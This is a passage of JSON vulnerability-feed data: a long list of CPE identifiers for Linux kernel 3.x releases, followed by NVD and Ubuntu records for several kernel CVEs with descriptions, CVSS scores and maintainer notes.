"cpe:2.3:o:linux:linux_kernel:3.4:rc7:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.40:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.45:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.47:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.3:*:*:*:*:*:x86:*", 
"cpe:2.3:o:linux:linux_kernel:3.4:*:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.2.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc6:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.4.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.31:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.31:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:*:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.7.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.65:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.42:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.34:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.49:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.61:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.2:*:*:*:*:*:*:*", 
"cpe:2.3:o:linux:linux_kernel:3.10.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.4:*:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.4.32:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc2:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.10.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.5:*:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.41:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.60:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.36:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.2:*:*:*:*:*:*:*", 
"cpe:2.3:o:linux:linux_kernel:3.5.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.48:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.2:*:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.4.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc3:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.11.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.59:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc4:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc5:*:*:*:*:*:*", 
"cpe:2.3:o:linux:linux_kernel:3.1:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.55:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.52:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.51:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.35:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.58:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.63:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.15:*:*:*:*:*:*:*", 
"cpe:2.3:o:linux:linux_kernel:3.0.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc1:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.5.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.54:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.67:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc5:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.46:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.1:*:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.1.5:*:*:*:*:*:*:*", 
"cpe:2.3:o:linux:linux_kernel:3.11.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.50:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.38:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.62:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.66:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.56:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.1:*:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.33:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.0:*:*:*:*:*:arm64:*", "cpe:2.3:o:linux:linux_kernel:3.2.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.44:*:*:*:*:*:*:*", 
"cpe:2.3:o:linux:linux_kernel:3.9.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.53:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.32:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.57:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.68:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.4:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-01T10:04:18", "description": "Use-after-free vulnerability in the skb_segment function in net/core/skbuff.c in the Linux kernel through 3.13.6 allows attackers to obtain sensitive information from kernel memory by leveraging the absence of a certain orphaning operation.", "cvss3": {}, "published": "2014-03-24T16:40:00", "type": "cve", "title": "CVE-2014-0131", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 5.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", 
"integrityImpact": "NONE", "baseScore": 2.9, "vectorString": "AV:A/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0131"], "modified": "2023-02-13T00:32:00", "cpe": ["cpe:/o:opensuse:evergreen:11.4", "cpe:/o:linux:linux_kernel:3.13.6", "cpe:/o:suse:linux_enterprise_server:11"], "id": "CVE-2014-0131", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0131", "cvss": {"score": 2.9, "vector": "AV:A/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.13.6:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:evergreen:11.4:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_server:11:sp2:*:*:ltss:*:*:*"]}], "ubuntucve": [{"lastseen": "2023-06-01T14:00:44", "description": "A missing authorization check in the fscrypt_process_policy function in\nfs/crypto/policy.c in the ext4 and f2fs filesystem encryption support in\nthe Linux kernel before 4.7.4 allows a user to assign an encryption policy\nto a directory owned by a different user, potentially creating a denial of\nservice.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.10 and earlier preview kernels; linux-lts-saucy no longer receives official support; linux-lts-quantal no longer receives official support\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-04-04T00:00:00", "type": "ubuntucve", "title": "CVE-2016-10318", 
"bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-10318"], "modified": "2017-04-04T00:00:00", "id": "UB:CVE-2016-10318", "href": "https://ubuntu.com/security/CVE-2016-10318", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2023-06-01T14:06:07", "description": "The vfe31_proc_general function in drivers/media/video/msm/vfe/msm_vfe31.c\nin the MSM-VFE31 driver for the Linux kernel 3.x, as used in Qualcomm\nInnovation Center (QuIC) Android contributions for MSM devices and other\nproducts, does not validate a certain id value, which allows attackers to\ngain privileges or cause a denial of service (memory corruption) via an\napplication that makes a crafted ioctl call.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.10 and earlier preview kernels; linux-lts-saucy no longer receives official support; linux-lts-quantal no longer receives official support\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-08-07T00:00:00", 
"type": "ubuntucve", "title": "CVE-2014-9410", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9410"], "modified": "2016-08-07T00:00:00", "id": "UB:CVE-2014-9410", "href": "https://ubuntu.com/security/CVE-2014-9410", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-01T13:59:49", "description": "The regulator_ena_gpio_free function in drivers/regulator/core.c in the\nLinux kernel before 3.19 allows local users to gain privileges or cause a\ndenial of service (use-after-free) via a crafted application.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.10 and earlier preview kernels; linux-lts-saucy no longer receives official support; linux-lts-quantal no longer receives official support\n", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-05-02T00:00:00", "type": "ubuntucve", "title": "CVE-2014-9940", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, 
"userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9940"], "modified": "2017-05-02T00:00:00", "id": "UB:CVE-2014-9940", "href": "https://ubuntu.com/security/CVE-2014-9940", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-01T13:56:05", "description": "Out-of-bounds memory read in the x509_decode_time function in\nx509_cert_parser.c in Linux kernels 4.3-rc1 and after.\n\n#### Bugs\n\n * <https://launchpad.net/bugs/1516750>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | While fd19a3d195be23e8d9d0d66576b96ea25eea8323 looks like the actual introduction of this issue, the code before this point didn't appear to do any date validation; perhaps the 'break' point ought to be the introduction of the crypto/asymmetric_keys/x509_cert_parser.c file instead. 
\n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.10 and earlier preview kernels linux-lts-saucy no longer receives official support linux-lts-quantal no longer receives official support\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 